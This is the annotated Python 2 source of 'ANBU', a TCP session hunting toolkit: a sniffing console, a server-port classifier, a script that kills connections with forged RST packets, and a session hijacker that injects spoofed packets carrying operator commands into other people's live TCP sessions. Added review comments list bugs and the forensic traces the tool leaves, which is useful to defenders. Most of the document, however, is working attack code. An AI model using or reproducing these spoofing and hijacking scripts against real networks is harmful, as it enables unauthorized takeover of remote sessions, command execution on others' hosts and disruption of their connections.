# ANBU :: TCP Session Hunter
# Author: St0rn
#anbu.py
#
#argv[1] = interface
#
#!usr/bin/env/python
#
# NOTE(review): Python 2 only (print statements, raw_input, thread module).
# The "#!usr/bin/env/python" line above is not on line 1 and is malformed,
# so it has no effect as a shebang; the script must be started as
# "python anbu.py <interface>".
#
# Operator console: sniffs TCP packets on the given interface into four
# parallel lists (ip_src/port_src/ip_dst/port_dst, one index per recorded
# connection) and spawns the helper scripts check_server.py, rst_hijack.py
# and session_hijack.py in separate xterm windows. Everything runs in the
# foreground process except the sniffers, which are started as raw threads.

import os
import sys
import string
import thread
from scapy.all import *

execute = []          # last operator command split on spaces (set in the main loop)
ip_src = []           # parallel lists: index i describes one observed TCP connection
port_src = []
ip_dst = []
port_dst = []

def intro():
    """Print the ASCII banner and the tool name (no return value)."""
    print(" )\ )\()) ( )\ (")
    print(" ((((_)( ((_)\ )((_) )\ ")
    print(" )\ _ )\ _((_)((_)_ _ ((_)")
    print(" (_)_\(_)| \| | | _ )| | | |")
    print(" / _ \ | .` | | _ \| |_| |")
    print(" /_/ \_\ |_|\_| |___/ \___/")
    print(" TCP SESSION HUNTER")
    print("\n\n\n")

def list_remp(p):
    """Sniffer callback: record the src/sport/dst/dport of a TCP packet.

    Appends one entry to each of the four module-level lists. The guard
    checks the four fields against their own lists independently, so a
    packet is skipped only when every one of its four values has already
    been seen somewhere (not necessarily in the same connection); the lists
    are therefore not an exact set of 4-tuples. Non-IP/TCP packets are
    ignored.
    """
    if p.haslayer(IP) and p.haslayer(TCP):
        if p[IP].src not in ip_src or p[TCP].sport not in port_src or p[IP].dst not in ip_dst or p[TCP].dport not in port_dst:
            ip_src.append(p[IP].src)
            port_src.append(p[TCP].sport)
            ip_dst.append(p[IP].dst)
            port_dst.append(p[TCP].dport)

def list_remp_filter(p, ip):
    """Same as list_remp, but only for packets whose IP src or dst equals ``ip``.

    ``ip`` is the operator-typed string after "sniff" and is only compared,
    never parsed, so a malformed value simply matches nothing.
    """
    if p.haslayer(IP) and p.haslayer(TCP):
        if p[IP].src == ip or p[IP].dst == ip:
            if p[IP].src not in ip_src or p[TCP].sport not in port_src or p[IP].dst not in ip_dst or p[TCP].dport not in port_dst:
                ip_src.append(p[IP].src)
                port_src.append(p[TCP].sport)
                ip_dst.append(p[IP].dst)
                port_dst.append(p[TCP].dport)

def sniff_connect(device):
    """Run an unbounded (count=0) scapy sniff on ``device``, feeding list_remp.

    Runs in a thread started by the main loop. The bare except swallows
    every error (including the permission error scapy raises when not run
    with raw-socket privileges) and the sys.exit() only ends this thread,
    not the console.
    """
    try:
        sniff(count=0, prn=list_remp, iface=device)
    except:
        print "\n Can't Launch sniffer...\n"
        sys.exit()

def sniff_connect_filter(device, ip):
    """Like sniff_connect, but restricted to packets involving ``ip`` via list_remp_filter."""
    try:
        sniff(count=0, prn= lambda p : list_remp_filter(p,ip), iface=device)
    except:
        print "\n Can't Launch sniffer...\n"
        sys.exit()

# ---- interactive console ----------------------------------------------------
os.system("clear")
intro()
if len(sys.argv) < 2:
    print "\nUsage: anbu.py <interface>\n"
else:
    # Command loop; no exception handling, so a bad "rst"/"hijack" argument
    # (non-numeric or out-of-range index -> ValueError/IndexError, or a
    # missing argument -> IndexError on execute[1]) terminates the console.
    while 1:
        inp = raw_input("\n > ")
        if string.lower(inp) == "help" or string.lower(inp) == "h":
            # "empty" (reset the connection lists) is accepted below but is
            # not listed here.
            print "\n help, h: Show Options"
            print " server: Server Discovery"
            print " sniff: sniff all Connexions"
            print " sniff <ip>: sniff cibled IP :: ex: sniff 192.168.1.34"
            print " ls: List Connexions"
            print " rst <nb>: Reset Connexion :: ex: rst 2"
            print " hijack <nb>: Hijack Connexion :: ex: hijack 2"
            print " clear: Clear CLI"
            print " quit, exit, q, e: Exit"
        elif string.lower(inp) == "ls":
            print "\n"
            # NOTE(review): "> 1" means a single recorded connection is
            # reported as no entries ("Aucune entrees" is French for that).
            if len(ip_src) > 1:
                for i in range(len(ip_src)):
                    print " ["+str(i)+"] " + ip_src[i] + ":" + str(port_src[i]) + " > " + ip_dst[i] + ":" + str(port_dst[i])
            else:
                print " Aucune entrees"
        elif string.lower(inp) == "empty":
            # Module-level rebinding; the callbacks look the names up globally,
            # so a running sniffer thread starts filling the new lists.
            ip_src = []
            port_src = []
            ip_dst = []
            port_dst = []
        elif string.lower(inp) == "clear":
            os.system("clear")
            intro()
        elif string.lower(inp) == "q" or string.lower(inp) == "quit" or string.lower(inp) == "e" or string.lower(inp) == "exit":
            sys.exit()
        elif string.lower(inp) == "sniff":
            thread.start_new_thread(sniff_connect, (sys.argv[1], ))
        elif string.lower(inp) == "server":
            # Helper scripts are spawned as separate processes in new xterm
            # windows via the shell; each one is expected in the current
            # working directory.
            os.system("xterm -e python check_server.py &")
        else:
            execute = inp.split(" ")
            if string.lower(execute[0]) == "sniff":
                thread.start_new_thread(sniff_connect_filter, (sys.argv[1],execute[1], ))
            elif string.lower(execute[0]) == "rst":
                # Argument order handed to rst_hijack.py: remote_host remote_port target
                # (dst address/port and src address of entry <nb>).
                num = execute[1]
                cmd = "xterm -e python rst_hijack.py " + ip_dst[int(num)] + " " + str(port_dst[int(num)]) + " " + str(ip_src[int(num)]) + " &"
                os.system(cmd)
            elif string.lower(execute[0]) == "hijack":
                # Argument order handed to session_hijack.py: ip_client ip_serveur
                # port_serveur iface. The interface name comes from argv and is
                # interpolated into a shell string unquoted.
                num = execute[1]
                cmd = "xterm -e python session_hijack.py " + ip_src[int(num)] + " " + str(ip_dst[int(num)]) + " " + str(port_dst[int(num)]) + " " + sys.argv[1] + " &"
                os.system(cmd)
            else:
                print "\n Not an option!"
----------------------------
# ANBU :: TCP Session Hunter Module: Server Discovery
# Author: St0rn
#check_server.py
#
#!usr/bin/env/python
#
# NOTE(review): Python 2 only; the "lambda(f):" tuple-parameter syntax below
# is a SyntaxError on Python 3. The shebang line is malformed and not on
# line 1, so it is inert.
#
# Passive listener: labels hosts as FTP/SSH/Telnet/Rlogin/MySQL servers
# purely from the TCP *source* port of packets seen on the default
# interface. Any host that answers from one of those ports is reported,
# whatever protocol actually runs there; nothing is sent.

import os
from scapy.all import *

ip = []       # parallel lists of (source address, source port) already reported
port = []

def check_interest_server(a):
    """Sniffer callback: print a one-line label for a packet from a well-known server port.

    ``a`` must carry IP and TCP layers (guaranteed by the lfilter below).
    The guard checks address and port against their lists independently,
    so a host that was already seen on one port is reported again on a
    second port only if that port number is new to the ``port`` list.
    Packets from other source ports are recorded but produce no output.
    """
    if a[IP].src not in ip or a[TCP].sport not in port:
        ip.append(a[IP].src)
        port.append(a[TCP].sport)
        if a[TCP].sport == 21:
            print "[+] " + a[IP].src + " Is a FTP Server on Port 21"
        elif a[TCP].sport == 22:
            print "[+] " + a[IP].src + " Is a SSH Server on port 22"
        elif a[TCP].sport == 23:
            print "[+] " + a[IP].src + " Is a Telnet Server on port 23"
        elif a[TCP].sport == 513:
            print "[+] " + a[IP].src + " Is a Rlogin Server on port 513"
        elif a[TCP].sport == 3306:
            print "[+] " + a[IP].src + " Is a MySQL Server on port 3306"

os.system("clear")
print "-> Server Discovery\n"
print " "
# count=0 sniffs until the process is killed; no iface is given here, unlike
# the other modules, so scapy's default interface is used.
sniff(count=0, prn = lambda a : check_interest_server(a), lfilter=lambda(f): f.haslayer(TCP) and f.haslayer(IP))
-----------------------------
# ANBU :: TCP Session Hunter Module: RST Hijacking
# Author: St0rn
#rst_hijack.py
#
# argv[1] = remote_host ; argv[2] = remote_port ; argv[3] = target
#
#!usr/bin/env/python
#
# NOTE(review): Python 2 only, same caveats as check_server.py. Sends a
# single forged TCP RST for the first matching packet, then waits for
# ENTER and exits. From a defender's view the forged segment is built by
# mirroring the observed packet (addresses, ports, TTL and window copied
# from the opposite direction) with a constant IP identification of 29321;
# a connection torn down by such a segment shows one RST whose IP-level
# fields do not follow the real peer's sequence of IDs.

from scapy.all import *
import sys
import os

# BPF filter string assembled from unvalidated argv values. The values are
# normally produced by anbu.py from parsed packet fields, not typed by hand.
filtre = "host " + sys.argv[1] + " and port " + sys.argv[2]

os.system("clear")
print "\nWaiting..."
print " "

def rst_hijack(p):
    """Sniffer callback: answer the first remote_host->target packet with a forged RST.

    ``p`` is an IP/TCP packet (guaranteed by lfilter). Only packets whose IP
    source is argv[1] and destination is argv[3] are acted on; others are
    ignored and sniffing continues. On a match the script blocks on
    raw_input() and then exits the whole process via sys.exit(), so at most
    one RST is ever sent per run.
    """
    if p[IP].src==sys.argv[1] and p[IP].dst==sys.argv[3]:
        print "\n[+] Connection Found!"
        print " "
        print "[+] It's time to blow this shit!"
        # Layer 2/3/4 headers are the observed packet's headers with src and
        # dst swapped; seq is taken from the observed ack so the segment lands
        # in the receiver's expected window. IP id is the constant 29321.
        ether = Ether(dst=p[Ether].src, src=p[Ether].dst)
        ip = IP(src=p[IP].dst, dst=p[IP].src, ihl=p[IP].ihl, flags=p[IP].flags, frag=p[IP].frag, ttl=p[IP].ttl, proto=p[IP].proto, id=29321)
        tcp = TCP(sport=p[TCP].dport, dport=p[TCP].sport, seq=p[TCP].ack, ack=p[TCP].seq, dataofs=p[TCP].dataofs, reserved=p[TCP].reserved, flags="R", window=p[TCP].window, options=p[TCP].options)
        reset = ether/ip/tcp
        # sendp() writes at layer 2 (raw-socket privileges presumably required).
        sendp(reset, verbose=0)
        print "\n\n Press ENTER to continue\n"
        raw_input()
        sys.exit()

sniff(count=0,prn = lambda p : rst_hijack(p),filter=filtre,lfilter=lambda(f): f.haslayer(IP) and f.haslayer(TCP))
-----------------------------
# ANBU :: TCP Session Hunter Module: Session Hijacking
# Author: St0rn
#session_hijack.py
#
# argv[1] = ip_client ; argv[2] = ip_serveur ; argv[3] = port_serveur ; argv[4] = iface
#
#!usr/bin/env/python
#
# NOTE(review): Python 2 only, same caveats as check_server.py. Injects
# forged PSH/ACK segments into an existing client->server TCP session by
# replying to server->client pushes as if it were the client. Host-level
# artifacts a defender can look for: an iptables OUTPUT rule dropping RSTs
# sourced from argv[1] that is added at start-up and never removed by this
# script, forged segments with a constant IP identification of 1337, and a
# fixed first payload "echo 1337\n" sent on the session.

from scapy.all import *
import sys
import os

# BPF filter: pushes from ip_serveur:port_serveur towards ip_client, built
# from unvalidated argv strings (normally supplied by anbu.py).
filtre = "dst host " + sys.argv[1] + " and src host " + sys.argv[2] + " and src port " + sys.argv[3] + " and tcp[tcpflags] & tcp-push != 0"

os.system("clear")

# NOTE(review): os.system() does not raise on a non-zero exit status, so the
# except branch is unreachable and the "[+] ... added" message is printed
# even when iptables failed (e.g. not root). The rule is appended, not
# checked for duplicates, and nothing in this script deletes it on exit.
# The OUTPUT chain only sees locally generated packets, so the rule is
# presumably meant to silence this host's own RST replies for argv[1].
try:
    os.system("iptables -A OUTPUT -p tcp --tcp-flags RST RST -s " + sys.argv[1] + " -j DROP")
    print("\n [+] iptables rule added for client RST packets\n")
except:
    print("\n [-] iptables rule don't added for client RST packets\n")

def hijack_session(p):
    """Sniffer callback for the first matching push: send one forged PSH/ACK carrying "echo 1337\\n".

    ``p`` is the observed server->client segment. Headers are mirrored
    (src/dst swapped, seq taken from the observed ack, TTL/window/options
    copied) and the IP id is the constant 1337. No return value.
    """
    print(" ")
    ether = Ether(dst=p[Ether].src, src=p[Ether].dst)
    ip = IP(src=p[IP].dst, dst=p[IP].src, ihl=p[IP].ihl, flags=p[IP].flags, frag=p[IP].frag, ttl=p[IP].ttl, proto=p[IP].proto, id=1337)
    tcp = TCP(sport=p[TCP].dport, dport=p[TCP].sport, seq=p[TCP].ack, ack=p[TCP].seq, dataofs=p[TCP].dataofs, reserved=p[TCP].reserved, flags="PA", window=p[TCP].window, options=p[TCP].options)
    hijack = ether/ip/tcp/"echo 1337\n"
    sendp(hijack, verbose=0)

def perm_session(p):
    """Sniffer callback for every later push: show the server payload, read operator input, inject it.

    Accesses p[Raw] unconditionally, so a PSH segment with no payload raises
    IndexError inside the callback (caught by the bare except around sniff
    below, which only prints a message). sys.stdin.read() blocks until EOF,
    not until a newline. The forged segment is built exactly as in
    hijack_session, with the operator text plus "\\n" as payload.
    """
    os.system("clear")
    if p[Raw].load:
        sys.stdout.write(p[Raw].load + " ")
    cmd = sys.stdin.read()
    ether = Ether(dst=p[Ether].src, src=p[Ether].dst)
    ip = IP(src=p[IP].dst, dst=p[IP].src, ihl=p[IP].ihl, flags=p[IP].flags, frag=p[IP].frag, ttl=p[IP].ttl, proto=p[IP].proto, id=1337)
    tcp = TCP(sport=p[TCP].dport, dport=p[TCP].sport, seq=p[TCP].ack, ack=p[TCP].seq, dataofs=p[TCP].dataofs, reserved=p[TCP].reserved, flags="PA", window=p[TCP].window, options=p[TCP].options)
    packet = ether/ip/tcp/(cmd+"\n")
    sendp(packet, verbose=0)

print(" [*] Hunting TCP Session " + sys.argv[1] + " => " + sys.argv[2] + ":"+ sys.argv[3]+"\n")

# One packet for the initial injection, then an endless loop of one-packet
# sniffs for perm_session. Each sniff is wrapped in a bare except that only
# prints, so permission errors and callback exceptions are reported as
# "can't launch sniffer" and the loop spins on; there is no clean exit path
# and the iptables rule above is left in place.
try:
    sniff(count = 1, prn=hijack_session, filter=filtre, lfilter = lambda(f) : f.haslayer(TCP), store=0, iface=sys.argv[4])
except:
    print(" [-] Can't launch sniffer :'(\n")

while 1:
    try:
        sniff(count = 1, prn=perm_session, filter=filtre, lfilter = lambda(f) : f.haslayer(TCP), store=0, iface=sys.argv[4])
    except:
        print(" [-] can't launch sniffer :'(\n")
St0rn